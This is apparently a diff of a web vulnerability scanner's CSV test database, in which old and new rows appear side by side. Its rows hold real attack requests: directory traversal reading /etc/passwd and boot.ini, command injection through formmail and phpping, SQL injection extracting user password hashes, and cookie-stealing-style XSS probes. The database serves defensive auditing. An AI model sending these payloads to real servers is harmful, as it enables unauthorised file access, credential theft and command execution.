[SERVICES]","","","","","BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.","",""534 "000509","1","5","/cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\winnt\win.ini","GET"," [fonts]","","","","","The ColdFusion install allows attackers to read arbitrary files remotely","",""535 "000510","1","5","/cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\windows\win.ini","GET"," [fonts]","","","","","The ColdFusion install allows attackers to read arbitrary files remotely","",""531 "000506","57324","5","/[SecCheck]/..%2f../ext.ini","GET","\[SERVICES\]","","","","","BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.","","" 532 "000507","57324","5","/[SecCheck]/..%255c..%255c../ext.ini","GET","\[SERVICES\]","","","","","BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.","","" 533 "000508","57324","5","/[SecCheck]/..%252f..%252f../ext.ini","GET","\[SERVICES\]","","","","","BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.","","" 534 "000509","1","5","/cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\winnt\win.ini","GET","\[fonts\]","","","","","The ColdFusion install allows attackers to read arbitrary files remotely","","" 535 "000510","1","5","/cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\windows\win.ini","GET","\[fonts\]","","","","","The ColdFusion install allows attackers to read arbitrary files remotely","","" 536 536 "000511","0","5","/.nsf/../winnt/win.ini","GET","200","","","","","This win.ini file can be downloaded.","","" 537 "000512","0","5","/prxdocs/misc/prxrch.idq?CiTemplate=../../../../../../../../../../winnt/win.ini","GET"," [fonts]","","","","","This allows arbitrary files to be retrieved from the server. MS01-033.","",""538 "000513","0","5","/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini","GET"," [fonts]","","","","","This allows arbitrary files to be retrieved from the server. MS01-033.","",""539 "000514","0","5","/iissamples/issamples/fastq.idq?CiTemplate=../../../../../../../../../../winnt/win.ini","GET"," [fonts]","","","","","This allows arbitrary files to be retrieved from the server. MS01-033.","",""540 "000515","0","5","/iissamples/issamples/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini","GET"," [fonts]","","","","","This allows arbitrary files to be retrieved from the server. MS01-033.","",""541 "000516","1210","5","/default.htm%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20","GET"," [fonts]","","","","","Server may be vulnerable to a Webhits.dll arbitrary file retrieval. Ensure Q252463i, Q252463a or Q251170 is installed. MS00-006.","",""542 "000517","1210","5","/default.htm%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20","GET"," [windows]","","","","","Server may be vulnerable to a Webhits.dll arbitrary file retrieval. Ensure Q252463i, Q252463a or Q251170 is installed. MS00-006.","",""537 "000512","0","5","/prxdocs/misc/prxrch.idq?CiTemplate=../../../../../../../../../../winnt/win.ini","GET","\[fonts\]","","","","","This allows arbitrary files to be retrieved from the server. MS01-033.","","" 538 "000513","0","5","/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini","GET","\[fonts\]","","","","","This allows arbitrary files to be retrieved from the server. MS01-033.","","" 539 "000514","0","5","/iissamples/issamples/fastq.idq?CiTemplate=../../../../../../../../../../winnt/win.ini","GET","\[fonts\]","","","","","This allows arbitrary files to be retrieved from the server. MS01-033.","","" 540 "000515","0","5","/iissamples/issamples/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini","GET","\[fonts\]","","","","","This allows arbitrary files to be retrieved from the server. MS01-033.","","" 541 "000516","1210","5","/default.htm%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20","GET","\[fonts\]","","","","","Server may be vulnerable to a Webhits.dll arbitrary file retrieval. Ensure Q252463i, Q252463a or Q251170 is installed. MS00-006.","","" 542 "000517","1210","5","/default.htm%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20","GET","\[windows\]","","","","","Server may be vulnerable to a Webhits.dll arbitrary file retrieval. Ensure Q252463i, Q252463a or Q251170 is installed. MS00-006.","","" 543 543 "000518","0","5","/................../config.sys","GET","200","","","","","PWS allows files to be read by prepending multiple '.' characters. At worst, IIS, not PWS, should be used.","","" 544 544 "000519","0","5","/cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini","GET","boot loader","","","","","Allows an attacker to view arbitrary files","","" … … 548 548 "000523","5553","5","/netget?sid=user&msg=300&file=../../../../../../../../../../etc/passwd","GET","root:","","","","","Sybex E-Trainer allows arbitrary files to be retrieved.","","" 549 549 "000524","0","5","/php/php.exe?c:\winnt\boot.ini","GET","boot loader","","","","","Apache/PHP installations can be misconfigured (according to documentation) to allow files to be retrieved remotely.","","" 550 "000525","53880","5","/phpping/index.php?pingto=www.test.com%20|%20dir%20c:\\","GET","boot .ini","","","","","PHP Ping allows commands to be executed on the remote host.","",""550 "000525","53880","5","/phpping/index.php?pingto=www.test.com%20|%20dir%20c:\\","GET","boot\.ini","","","","","PHP Ping allows commands to be executed on the remote host.","","" 551 551 "000526","14484","5","/scripts/db4web_c.exe/dbdirname/c%3A%5Cboot.ini","GET","boot loader","","","","","The boot.ini file was retrieved by using the db4web executable.","","" 552 552 "000527","0","5","/us/cgi-bin/sewse.exe?d:/internet/sites/us/sewse/jabber/comment2.jse+c:\boot.ini","GET","boot loader","","","","","Default scripts can allow arbitrary access to the host.","","" 553 553 "000528","59599","5","/wx/s.dll?d=/boot.ini","GET","boot loader","","","","","WebCollection Plus allows any file to be retrieved from the remote system.","","" 554 "000529","0","5","@CGIDIRSAlbum?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0","GET","resolv .conf","","","","","This CGI allows attackers to view arbitrary files on the host.","",""554 "000529","0","5","@CGIDIRSAlbum?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0","GET","resolv\.conf","","","","","This CGI allows attackers to view arbitrary files on the host.","","" 555 555 "000530","0","5","/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../boot.ini","GET","boot loader","","","","","The Web_Server_4D is vulnerable to a directory traversal problem.","","" 556 "000531","17110","5","/servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../boot.ini%00","GET"," [boot loader]","","","","","The Novell Groupwise WebAcc Servlet allows attackers to view arbitrary files on the server.","",""557 "000532","10424","5","@CGIDIRSSQLServ/sqlbrowse.asp?filepath=c:\&Opt=3","GET","boot .ini","","","","","Hosting Controller versions 1.4.1 and lower can allow arbitrary files/directories to be read. Upgrade.","",""558 "000533","10420","5","@CGIDIRSstats/statsbrowse.asp?filepath=c:\&Opt=3","GET","boot .ini","","","","","Hosting Controller versions 1.4.1 and lower can allow arbitrary files/directories to be read. Upgrade.","",""559 "000534","0","5","@CGIDIRStest.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\","GET","boot .ini","","","","","This CGI allows attackers to read files from the server.","",""560 "000535","0","5","@CGIDIRStst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,","GET","boot .ini","","","","","This CGI allows attackers to execute arbitrary commands on the server.","",""561 "000536","0","5","@CGIDIRSinput.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\","GET","boot .ini","","","","","This CGI allows attackers to read files from the server.","",""562 "000537","0","5","@CGIDIRSinput2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\","GET","boot .ini","","","","","This CGI allows attackers to read files from the server.","",""563 "000538","0","5","/ssi/envout.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\","GET","boot .ini","","","","","This CGI allows attackers to read files from the server.","",""556 "000531","17110","5","/servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../boot.ini%00","GET","\[boot loader\]","","","","","The Novell Groupwise WebAcc Servlet allows attackers to view arbitrary files on the server.","","" 557 "000532","10424","5","@CGIDIRSSQLServ/sqlbrowse.asp?filepath=c:\&Opt=3","GET","boot\.ini","","","","","Hosting Controller versions 1.4.1 and lower can allow arbitrary files/directories to be read. Upgrade.","","" 558 "000533","10420","5","@CGIDIRSstats/statsbrowse.asp?filepath=c:\&Opt=3","GET","boot\.ini","","","","","Hosting Controller versions 1.4.1 and lower can allow arbitrary files/directories to be read. Upgrade.","","" 559 "000534","0","5","@CGIDIRStest.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\","GET","boot\.ini","","","","","This CGI allows attackers to read files from the server.","","" 560 "000535","0","5","@CGIDIRStst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,","GET","boot\.ini","","","","","This CGI allows attackers to execute arbitrary commands on the server.","","" 561 "000536","0","5","@CGIDIRSinput.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\","GET","boot\.ini","","","","","This CGI allows attackers to read files from the server.","","" 562 "000537","0","5","@CGIDIRSinput2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\","GET","boot\.ini","","","","","This CGI allows attackers to read files from the server.","","" 563 "000538","0","5","/ssi/envout.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\","GET","boot\.ini","","","","","This CGI allows attackers to read files from the server.","","" 564 564 "000539","0","5","/php/php.exe?c:\boot.ini","GET","boot loader","","","","","The Apache config allows php.exe to be called directly."," ","" 565 565 "000540","0","5","/../../../../../../../../../boot.ini","GET","boot loader","","","","","The remote server allows any system file to be retrieved remotely.","","" … … 579 579 "000554","13302","5","/docs/showtemp.cfm?TYPE=JPEG&FILE=c:\boot.ini","GET","boot loader","","","","","Gafware's CFXImage allows remote users to view any file on the system.","","" 580 580 "000555","59600","5","/ezhttpbench.php?AnalyseSite=/etc/passwd&NumLoops=1","GET","root:","","","","","eZ httpbench version 1.1 allows any file on the remote server to be retrieved.","","" 581 "000556","2870","5","/index.php?download=/winnt/win.ini","GET"," [fonts]","","","","","Snif 1.2.4 allows any file to be retrieved from the web server.","",""582 "000557","2870","5","/index.php?download=/windows/win.ini","GET"," [windows]","","","","","Snif 1.2.4 allows any file to be retrieved from the web server.","",""581 "000556","2870","5","/index.php?download=/winnt/win.ini","GET","\[fonts\]","","","","","Snif 1.2.4 allows any file to be retrieved from the web server.","","" 582 "000557","2870","5","/index.php?download=/windows/win.ini","GET","\[windows\]","","","","","Snif 1.2.4 allows any file to be retrieved from the web server.","","" 583 583 "000558","2870","5","/index.php?download=/etc/passwd","GET","root:","","","","","Snif 1.2.4 allows any file to be retrieved from the web server.","","" 584 584 "000559","59085","5","/index.php?|=../../../../../../../../../etc/passwd","GET","root:","","","","","Portix-PHP Portal allows retrieval of arbitrary files via the '..' type filtering problem.","","" … … 625 625 "000600","0","5","@CGIDIRSformmail?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test","GET","root:","","","","","This CGI allows attackers to retrieve arbitrary files from the server.","","" 626 626 "000601","0","5","@CGIDIRSformmail.pl?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test","GET","root:","","","","","This CGI allows attackers to retrieve arbitrary files from the server.","","" 627 "000602","603","5","@CGIDIRSgenerate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1","GET"," [fonts]","","","","","This CGI from SIX webboard allows attackers read arbitrary files on the host.","",""628 "000603","603","5","@CGIDIRSgenerate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1","GET"," [windows]","","","","","This CGI from SIX webboard allows attackers read arbitrary files on the host.","",""627 "000602","603","5","@CGIDIRSgenerate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1","GET","\[fonts\]","","","","","This CGI from SIX webboard allows attackers read arbitrary files on the host.","","" 628 "000603","603","5","@CGIDIRSgenerate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1","GET","\[windows\]","","","","","This CGI from SIX webboard allows attackers read arbitrary files on the host.","","" 629 629 "000604","603","5","@CGIDIRSgenerate.cgi?content=../../../../../../../../../../etc/passwd%00board=board_1","GET","root:","","","","","This CGI from SIX webboard allows attackers read arbitrary files on the host.","","" 630 630 "000605","0","5","@CGIDIRShtmlscript?../../../../../../../../../../etc/passwd","GET","root:","","","","","This CGI contains a well known vuln that allows attackers to read any system file.","","" … … 638 638 "000613","8192","5","@CGIDIRSmail/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../etc/passwd%00","GET","root:","","","","","MailReader.com v2.3.31 web package allows remote users to retrieve any system file.","","" 639 639 "000614","5161","5","@CGIDIRSmail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00","GET","root:","","","","","EmuMail allows any file to be retrieved from the remote system.","","" 640 "000615","0","5","@CGIDIRSloadpage.cgi?user_id=1&file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini","GET"," [windows]","","","","","This CGI allows attackers to read arbitrary files on the host.","",""640 "000615","0","5","@CGIDIRSloadpage.cgi?user_id=1&file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini","GET","\[windows\]","","","","","This CGI allows attackers to read arbitrary files on the host.","","" 641 641 "000616","0","5","@CGIDIRSloadpage.cgi?user_id=1&file=../../../../../../../../../../etc/passwd","GET","root:","","","","","This CGI allows attackers to read arbitrary files on the host.","","" 642 642 "000617","89","5","@CGIDIRShtsearch?exclude=%60/etc/passwd%60","GET","root:","","","","","This CGI contains a well known vuln that allows attackers to read any system file.","","" 643 643 "000618","0","5","@CGIDIRSshop.cgi?page=../../../../../../../etc/passwd","GET","root:","","","","","Remote file read retrieval.","","" 644 644 "000619","0","5","@CGIDIRSsendtemp.pl?templ=../../../../../../../../../../etc/passwd","GET","root:","","","","","This CGI contains a well known vuln that allows attackers to read any system file.","","" 645 "000620","0","5","@CGIDIRSsearch/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc","GET","resolv .conf","","","","","It is possible to read files on the remote server, this CGI should be removed.","",""645 "000620","0","5","@CGIDIRSsearch/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc","GET","resolv\.conf","","","","","It is possible to read files on the remote server, this CGI should be removed.","","" 646 646 "000621","521","5","@CGIDIRSsearch.pl?form=../../../../../../../../../../etc/passwd%00","GET","root:","","","","","The ROADS search.pl allows attackers to retrieve system files.","","" 647 "000622","0","5","@CGIDIRSsearch.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini","GET"," [fonts]","","","","","This CGI contains a well known vuln that allows attackers to read any system file.","",""648 "000623","0","5","@CGIDIRSsearch.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini","GET"," [windows]","","","","","This CGI contains a well known vuln that allows attackers to read any system file.","",""647 "000622","0","5","@CGIDIRSsearch.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini","GET","\[fonts\]","","","","","This CGI contains a well known vuln that allows attackers to read any system file.","","" 648 "000623","0","5","@CGIDIRSsearch.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini","GET","\[windows\]","","","","","This CGI contains a well known vuln that allows attackers to read any system file.","","" 649 649 "000624","0","5","@CGIDIRSquickstore.cgi?page=../../../../../../../../../../etc/passwd%00html&cart_id=","GET","root:","","","","","This CGI allows attackers to read arbitrary files on the remote system.","","" 650 650 "000625","0","5","@CGIDIRSpublisher/search.cgi?dir=jobs&template=;cat%20/etc/passwd|&output_number=10","GET","root:","","","","","AHG's search.cgi allows any command to be executed. www.ahg.com.","","" … … 696 696 "000673","0","7","/.../.../.../.../.../.../.../.../.../boot.ini","GET","boot loader","","","","","Software allows files to be retrieved outside of the web root by using 'triple dot' notation. May be MiniPortal?","","" 697 697 "000674","0","7","/................../etc/passwd","GET","root:","","","","","The web server allows the password file to be retrieved.","","" 698 "000675","0","3","/%3f.jsp","GET"," index of ","","","","","JRun 3.0 and 3.1 on NT/2000 running IIS4 or IIS5 allow directory listing by requesting %3f.jsp at the end of a URL.","",""699 "000677","388","7","/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini","GET"," [windows]","","","","","Attackers can read any file on the system. Upgrade to Analogx 1.07 or higher.","",""698 "000675","0","3","/%3f.jsp","GET","[Ii]ndex [Oo]f ","","","","","JRun 3.0 and 3.1 on NT/2000 running IIS4 or IIS5 allow directory listing by requesting %3f.jsp at the end of a URL.","","" 699 "000677","388","7","/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini","GET","\[windows\]","","","","","Attackers can read any file on the system. Upgrade to Analogx 1.07 or higher.","","" 700 700 "000678","0","7","/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd","GET","root:","","","","","Web server allows reading of files by sending encoded '../' requests. This server may be Boa (boa.org).","","" 701 701 "000679","0","3","/%00","GET","File Name","","","","","Appending /%00 to a request to the web server may reveal a directory listing.","","" 702 "000680","0","7","/ca//\\../\\../\\../\\../\\../\\../\\windows/\\win.ini","GET"," [windows]","","","","","It is possible to read files on the server by adding through directory traversal by adding multiple /\\.. in front of file name.","",""702 "000680","0","7","/ca//\\../\\../\\../\\../\\../\\../\\windows/\\win.ini","GET","\[windows\]","","","","","It is possible to read files on the server by adding through directory traversal by adding multiple /\\.. in front of file name.","","" 703 703 "000681","0","7","/ca/..\\..\\..\\..\\..\\..\\/\\etc/\\passwd","GET","root:","","","","","It is possible to read files on the server by adding through directory traversal by adding multiple /\\.. in front of file name.","","" 704 "000682","0","7","/ca/..\\..\\..\\..\\..\\..\\..\\..\\winnt/\\win.ini","GET"," [fonts]","","","","","It is possible to read files on the server by adding through directory traversal by adding multiple /\\.. in front of file name.","",""704 "000682","0","7","/ca/..\\..\\..\\..\\..\\..\\..\\..\\winnt/\\win.ini","GET","\[fonts\]","","","","","It is possible to read files on the server by adding through directory traversal by adding multiple /\\.. in front of file name.","","" 705 705 "000683","728","9","/admentor/adminadmin.asp","GET","200","","","","","Version 2.11 of AdMentor is vulnerable to SQL injection during login, in the style of: ' or =","","" 706 706 "000684","36894","9","@POSTNUKEMy_eGallery/public/displayCategory.php","GET","200","","","","","My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection. displayCategory.php calls imageFunctions.php without checking URL/location arguments.","","" … … 710 710 "000688","0","9","/site/' UNION ALL SELECT FileToClob('/etc/passwd','server')::html,0 FROM sysusers WHERE username=USER --/.html","GET","root:","","","","","IBM Informix Web DataBlade allows remote execution of SQL","","" 711 711 "000689","0","9","/site/' UNION ALL SELECT FileToClob('/etc/passwd','server')::html,0 FROM sysusers WHERE username = USER --/.html","GET","root:","","","","","Web DataBlade 4.12/Informix is vulnerable to SQL injection.","","" 712 "000690","0","9","/postnuke/index.php?module=My_eGallery&do=showpic&pid=-1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat(0x3C7230783E,pn_uname,0x3a,pn_pass,0x3C7230783E),0,0,0/**/FROM/**/md_users/**/WHERE/**/pn_uid=$id/*","GET","<r0x> (.+?)<r0x>","","","","","My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection.","",""713 "000691","0","9","/postnuke/html/index.php?module=My_eGallery&do=showpic&pid=-1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat(0x3C7230783E,pn_uname,0x3a,pn_pass,0x3C7230783E),0,0,0/**/FROM/**/md_users/**/WHERE/**/pn_uid=$id/*","GET","<r0x> (.+?)<r0x>","","","","","My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection.","",""714 "000692","0","8","@CGIDIRSalibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,","GET","boot .ini","","","","","This CGI allows attackers to execute arbitrary commands on the server.","",""712 "000690","0","9","/postnuke/index.php?module=My_eGallery&do=showpic&pid=-1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat(0x3C7230783E,pn_uname,0x3a,pn_pass,0x3C7230783E),0,0,0/**/FROM/**/md_users/**/WHERE/**/pn_uid=$id/*","GET","<r0x>\(\.\+\?\)<r0x>","","","","","My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection.","","" 713 "000691","0","9","/postnuke/html/index.php?module=My_eGallery&do=showpic&pid=-1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat(0x3C7230783E,pn_uname,0x3a,pn_pass,0x3C7230783E),0,0,0/**/FROM/**/md_users/**/WHERE/**/pn_uid=$id/*","GET","<r0x>\(\.\+\?\)<r0x>","","","","","My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection.","","" 714 "000692","0","8","@CGIDIRSalibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,","GET","boot\.ini","","","","","This CGI allows attackers to execute arbitrary commands on the server.","","" 715 715 "000693","0","9","/phpwebsite/index.php?module=calendar&calendar[view]=day&year=2003%00-1&month=","GET","DB Error: syntax error","","","","","phpWebSite 0.9.x and below are vulnerable to SQL injection.","","" 716 716 "000694","2875","9","/phpBB2/search.php?search_id=1\\","GET","SQL Error","","","","","phpBB 2.06 search.php is vulnerable to SQL injection attack. Error page also includes full path to search.php file.","","" 717 "000695","0","9","/index.php?module=My_eGallery&do=showpic&pid=-1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat(0x3C7230783E,pn_uname,0x3a,pn_pass,0x3C7230783E),0,0,0/**/FROM/**/md_users/**/WHERE/**/pn_uid=$id/*","GET","<r0x> (.+?)<r0x>","","","","","My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection.","",""717 "000695","0","9","/index.php?module=My_eGallery&do=showpic&pid=-1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat(0x3C7230783E,pn_uname,0x3a,pn_pass,0x3C7230783E),0,0,0/**/FROM/**/md_users/**/WHERE/**/pn_uid=$id/*","GET","<r0x>\(\.\+\?\)<r0x>","","","","","My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection.","","" 718 718 "000696","10107","9","/author.asp","GET","200","","","","","May be FactoSystem CMS, which could include SQL injection problems that could not be tested remotely.","","" 719 "000697","0","4","/horde/test.php","GET","IMP: 3 .(0|1|2|2\.1)","","","","","IMP version 3.0, 3.1, 3.2, or 3.2.1 are vulnerable to Cross Site Scripting (XSS). See http://marc.theaimsgroup.com/?l=imp&m=105940167329471&w=2.","",""720 "000698","0","4","/imp/horde/test.php","GET","IMP: 3 .(0|1|2|2\.1)","","","","","IMP version 3.0, 3.1, 3.2, or 3.2.1 are vulnerable to Cross Site Scripting (XSS). See http://marc.theaimsgroup.com/?l=imp&m=105940167329471&w=2.","",""721 "000699","0","4","@CGIDIRShorde/test.php","GET","IMP: 3 .(0|1|2|2\.1)","","","","","IMP version 3.0, 3.1, 3.2, or 3.2.1 are vulnerable to Cross Site Scripting (XSS). See http://marc.theaimsgroup.com/?l=imp&m=105940167329471&w=2.","",""719 "000697","0","4","/horde/test.php","GET","IMP: 3\.\(0\|1\|2\|2\\\.1\)","","","","","IMP version 3.0, 3.1, 3.2, or 3.2.1 are vulnerable to Cross Site Scripting (XSS). See http://marc.theaimsgroup.com/?l=imp&m=105940167329471&w=2.","","" 720 "000698","0","4","/imp/horde/test.php","GET","IMP: 3\.\(0\|1\|2\|2\\\.1\)","","","","","IMP version 3.0, 3.1, 3.2, or 3.2.1 are vulnerable to Cross Site Scripting (XSS). See http://marc.theaimsgroup.com/?l=imp&m=105940167329471&w=2.","","" 721 "000699","0","4","@CGIDIRShorde/test.php","GET","IMP: 3\.\(0\|1\|2\|2\\\.1\)","","","","","IMP version 3.0, 3.1, 3.2, or 3.2.1 are vulnerable to Cross Site Scripting (XSS). See http://marc.theaimsgroup.com/?l=imp&m=105940167329471&w=2.","","" 722 722 "000700","0","4","/examples/cookie","GET","Cookie servlet","","","","","JEUS default servlet examples are vulnerable to Cross Site Scripting (XSS) when requesting non-existing JSP pages. http://securitytracker.com/alerts/2003/Jun/1007004.html","","" 723 723 "000701","0","4","/examples/session","GET","Session servlet","","","","","JEUS default servlet examples are vulnerable to Cross Site Scripting (XSS) when requesting non-existing JSP pages. http://securitytracker.com/alerts/2003/Jun/1007004.html","","" 724 "000702","7501","4","/themes/mambosimple.php?detection=detected&sitename=</title><script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""725 "000703","0","4","/index.php?option=search&searchword=<script>alert(document.cookie);</script>","GET","<script>alert (document.cookie);</script>","","","","","Mambo Site Server 4.0 build 10 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""726 "000704","7505","4","/emailfriend/emailnews.php?id=\"<script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""727 "000705","7504","4","/emailfriend/emailfaq.php?id=\"<script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""728 "000706","7503","4","/emailfriend/emailarticle.php?id=\"<script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""729 "000707","0","4","/administrator/upload.php?newbanner=1&choice=\"<script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""730 "000708","7495","4","/administrator/popups/sectionswindow.php?type=web&link=\"<script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""731 "000709","7498","4","/administrator/gallery/view.php?path=\"<script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""732 "000710","7499","4","/administrator/gallery/uploadimage.php?directory=\"<script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""733 "000711","7497","4","/administrator/gallery/navigation.php?directory=\"<script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""734 "000712","7496","4","/administrator/gallery/gallery.php?directory=\"<script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""735 "000713","2820","4","/index.php?dir=<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","Auto Directory Index 1.2.3 and prior are vulnerable to XSS attacks.","",""736 "000714","0","4","/https-admserv/bin/index?/<script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","Sun ONE Web Server 6.1 administration control is vulnerable to XSS attacks.","",""737 "000715","2876","4","/clusterframe.jsp?cluster=<script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","Macromedia JRun 4.x JMC Interface, clusterframe.jsp file is vulnerable to a XSS attack.","",""738 "000716","0","4","/article.cfm?id=1'<script>alert(document.cookie);</script>","GET"," [SQL SERVER] Error Code","","","","","ColdFusion may reveal SQL information in malformed requests.","",""739 "000717","0","4","/upload.php?type=\"<script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""740 "000718","4619","4","/soinfo.php?\"><script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","The PHP script soinfo.php is vulnerable to Cross Site Scripting. Set expose_php = Off in php.ini.","",""741 "000719","0","4","/modules.php?op=modload&name=News&file=index&catid=&topic=><script>alert('Vulnerable');</script>;","GET","<script>alert ('Vulnerable')</script>","","","","","Postnuke is vulnerable to Cross Site Scripting. CA-2000-02.","",""742 "000720","0","4","/modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script>","GET","<script>alert 